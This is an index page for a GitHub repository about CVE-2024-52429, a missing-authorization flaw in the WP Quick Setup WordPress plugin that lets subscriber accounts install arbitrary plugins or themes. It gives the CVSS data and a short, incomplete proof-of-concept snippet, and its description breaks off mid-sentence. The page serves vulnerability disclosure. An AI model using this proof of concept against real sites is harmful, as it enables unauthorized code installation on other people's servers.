Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/randomrobbiebf/cve-2024-52429
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation
Last synced: 12 days ago
- Host: GitHub
- URL: https://github.com/randomrobbiebf/cve-2024-52429
- Owner: RandomRobbieBF
- Created: 2024-11-22T10:26:55.000Z (about 1 month ago)
- Default Branch: main
- Last Pushed: 2024-11-22T10:28:33.000Z (about 1 month ago)
- Last Synced: 2024-11-22T11:26:07.107Z (about 1 month ago)
- Size: 0 Bytes
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# CVE-2024-52429
WP Quick Setup <= 2.0 - Missing Authorization to Authenticated (Subscriber+) Arbitrary Plugin/Theme Installation

# Description:
The WP Quick Setup plugin for WordPress is vulnerable to unauthorized plugin and theme installation due to a missing capability check on a function in all versions up to, and including, 2.0. This makes it
```
Type: plugin
CVSS Score: 8.8
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
CVE: CVE-2024-52429
```

POC
---

Login as a subscriber, then run this HTML:
```
history.pushState('', '', '/');
document.forms[0].submit();
```